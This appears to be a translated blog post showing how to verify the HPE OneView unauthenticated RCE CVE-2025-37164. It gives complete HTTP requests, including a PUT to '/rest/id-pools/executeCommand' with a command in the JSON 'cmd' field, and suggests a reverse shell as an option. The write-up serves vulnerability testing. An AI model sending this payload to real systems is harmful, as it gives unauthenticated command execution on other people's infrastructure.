CVE-2025–37164:影响Hewlett Packard Enterprise OneView的严重未认证RCE漏洞
在这篇简短的博客中,我们来讨论验证主机是否易受CVE-2025–37164攻击的选项。CVE-2025–37164是一个未认证的远程代码执行漏洞,影响11.0版本之前的HPE OneView软件。该RCE之所以可能,是由于“/rest/id-pools/executeCommand”端点存在一个典型的类型混淆RCE漏洞。
所有早于11.00且未应用相关热修复补丁的版本均受影响。由于漏洞位于“/rest/id-pools/executeCommand”端点,因此该端点不存在的虚拟机不受影响。根据我的初步测试,一些ESXi和Hyper-V虚拟机似乎不易受攻击(但我强烈建议在你的环境中交叉检查以确认该端点是否启用)。我还没有机会在KVM虚拟机上测试此漏洞的利用。
据报道,所有运行在HPE Synergy Composer上的OneView软件也受影响。我同样没有机会对此进行验证(需要一个设备 :) )。
在下面的图片中,我们使用了用于ESXi虚拟机的HPE OneView版本10.20.00.xxx。
GET /rest/appliance/version HTTP/1.1
Host: <targethosthere>
User-Agent: rootaddict
Accept: */*
Connection: keep-alive
(此处为图片占位符,说明:上图显示的测试ESXi虚拟机版本为10.20.00.xxx)
调用易受攻击的端点只会显示HTTP响应404。
PUT /rest/id-pools/executeCommand HTTP/1.1
Host: <targethosthere>
User-Agent: rootaddict
Content-Type: application/json
Content-Length: 33
Connection: keep-alive
{"cmd":"commandhere","result":false}
(此处为图片占位符,说明:上图显示,在测试的VMWare ESXi虚拟机中,该端点不存在)
在下面的图片中,我们使用了用于Hyper-V虚拟机的HPE OneView版本10.20.00.xxx。 (此处为图片占位符,说明:图片显示了用于Hyper-V虚拟机的HPE OneView版本10.20.00)
下面的响应同样返回HTTP响应404。 (此处为图片占位符,说明:在Hyper-V VM的10.20.00版本中,易受攻击的端点不存在)
在下面的图片中,我们使用了用于Hyper-V虚拟机的HPE OneView版本06.60.07.xxx。 (此处为图片占位符,说明:图片显示了用于Hyper-V虚拟机的HPE OneView版本6.60.07)
现在,向易受攻击端点发送的GET请求返回HTTP响应401而不是404,这表明在该软件版本中易受攻击的端点已启用。
GET /rest/id-pools/executeCommand HTTP/1.1
Host: <yourtargethosthere>
User-Agent: rootaddict
Accept: */*
Connection: keep-alive
(此处为图片占位符,说明:上图显示了不同的HTTP响应,不是404而是401)
通过调用目标主机执行一些命令来确认漏洞。在下面的示例中,我们仅使用了Ping命令。在你的用例中,可以随意设置反向Shell。
PUT /rest/id-pools/executeCommand HTTP/1.1
Host: <targethosthere>
User-Agent: rootaddict
Content-Type: application/json
Content-Length: 46
Connection: keep-alive
{"cmd":"ping <tester's/attacker'sIPhere>","result":false}
(此处为图片占位符,说明:上图显示测试者试图调用目标主机执行ping命令)
下面的图片显示目标主机成功执行了ping命令,确认目标主机既存在漏洞又可被利用。 (此处为图片占位符,说明:图片显示目标主机确实执行了ping命令。)
参考链接:
- nvd.nist.gov/vuln/detail…
- support.hpe.com/hpesc/publi…
- thehackernews.com/2025/12/hpe…
- myenterpriselicense.hpe.com/cwp-ui/prod…
- www.rapid7.com/blog/post/e…
免责声明: 本博客提供的信息仅用于一般性参考。虽然我总是力求准确,但某些细节可能不准确,提供的列表也可能不完整。尽管如此,我强烈建议在做出任何决定或采取行动之前,依据行业标准文件和官方来源(上面参考部分列出了一些)核实任何关键信息。 此处表达的所有观点均是我个人的,不代表我的雇主的观点或立场。 CSD0tFqvECLokhw9aBeRqtTv15RNmaHdiNZPviuVo93sSoZJ811tDb5XudC7fhF8Sry89Uj5TnG+CWCdS0uO8yyO5NQlMh0oTHmMXSTZk3bna+MOQoPowha6TFDBHUrW3M1FdpBAsvZYVhNCY2SgRR4emYEzvJSXet9PUb5o9dc3akYrq4WQW5kk6t6O56Nb
